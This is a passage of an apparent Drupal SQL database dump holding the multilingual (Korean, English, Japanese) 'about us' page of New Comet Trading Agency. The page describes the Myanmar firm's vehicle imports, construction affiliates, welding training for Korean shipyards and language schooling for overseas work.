('page', 0, 23, 296, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 297, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"57f9e79c-83d7-4db7-a975-0311fbe63328\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"70254dac-c742-4d7a-8423-eaf0e5f62cb8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"3bdc401a-2f52-4f83-8f7a-647bd7c11600\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 297, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><img data-align=\"center\" data-entity-uuid=\"663f2f7b-fe72-4e59-9d3b-c336ed24793f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_3.jpg\"><img data-entity-uuid=\"2b72d0df-bb39-4ae6-b065-54b7507416ad\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"7a91e859-2d7e-464a-b848-a660987c0ce3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 297, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img data-entity-uuid=\"0a89d13f-c12c-43f7-a18f-7bcd1d908d75\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"136af80f-38b1-4d25-9ce5-02123b7285ad\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"637ad23f-775f-409b-98d9-aa8d53f8de5f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" 